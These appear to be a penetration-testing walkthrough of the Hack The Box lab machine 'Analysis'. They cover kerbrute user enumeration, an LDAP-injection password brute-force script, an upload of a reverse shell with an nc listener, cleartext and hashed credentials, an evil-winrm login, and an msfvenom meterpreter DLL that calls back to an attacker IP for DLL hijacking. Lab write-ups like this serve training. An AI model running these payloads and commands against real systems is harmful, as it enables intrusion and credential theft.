53,80,88,135,139,445,464,593,3268,3269,3306,5985,9389,33060,47001,49664,49665,49666,49667,49669,49670,49671,49672,49676,49679,49784
echo "10.129.230.179 analysis.htb dc.analysis.htb" >> /etc/hosts
Β
kerbrute:
kerbrute userenum -d analysis.htb /usr/share/wordlists/rockyou.txt --dc dc.analysis.htb
2024/01/25 06:33:01 > [+] VALID USERNAME: jangel@analysis.htb 2024/01/25 06:33:06 > [+] VALID USERNAME: technician@analysis.htb 2024/01/25 06:34:17 > [+] VALID USERNAME: cwilliams@analysis.htb 2024/01/25 06:34:53 > [+] VALID USERNAME: ajohnson@analysis.htb 2024/01/25 06:35:33 > [+] VALID USERNAME: wsmith@analysis.htb 2024/01/25 06:43:06 > [+] VALID USERNAME: TECHNICIAN@analysis.htb 2024/01/25 06:43:18 > [+] VALID USERNAME: JANGEL@analysis.htb
Β
subdomain scanning
add internal.analysis.htb
git clone https://github.com/maurosoria/dirsearch.git --depth 1
python3 dirsearch.py -u http://internal.analysis.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
get a login page
http://internal.analysis.htb/employees/
under /user
Β
http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=*)
itβs ldap injection
import argparse import requests import urllib.parse def main(): charset_path = "/opt/useful/SecLists/Fuzzing/alphanum-case-extra.txt" base_url = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)" found_chars = "" skip_count = 6 add_star = True with open(charset_path, 'r') as file: for char in file: char = char.strip() # URL encode the character char_encoded = urllib.parse.quote(char) # Check if '*' is found and skip the first 6 '*' characters if '*' in char and skip_count > 0: skip_count -= 1 continue # Add '*' after encountering it for the first time if '*' in char and add_star: found_chars += char print(f"[+] Found Password: {found_chars}") add_star = False continue modified_url = base_url.replace("{FUZZ}", char_encoded).replace("{found_char}", found_chars) response = requests.get(modified_url) if "technician" in response.text and response.status_code == 200: found_chars += char print(f"[+] Found Password: {found_chars}") file.seek(0, 0) if __name__ == "__main__": main()
TECHNICIAN@analysis.htb:97NTtl*4QP96Bv
go back to login
try to upload a reverse shell
nv -lvnp 1234
get the initial access
Β
i ran the winpeas.exe on the target machine
Β
svc_web::ANALYSIS:1122334455667788:f0cf2b9ea6ed06151191863c3d470381:01010000000000005771166f7d4fda01e239d6af28279dba000000000800300030 0000000000000000000000002100002e2361ea3bcbc97ed694aa26c2747045c2b2409b2e9c0ac817ab5e11b5f974080a0010000000000000000000000000000000000009000000000 0000000000000
jdoe:7y4Z4^*y9Zzj
try that credential by evil-winrm
evil-winrm -u 'jdoe' -p '7y4Z4^*y9Zzj' -i 10.129.55.86
Β
Β
There is snort on the target, by examining the config file, itβs running sf_engine.dll
there is a dll hijacking
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.65 LPORT=6666 -f dll -o reverse.dll
get the shell!
Β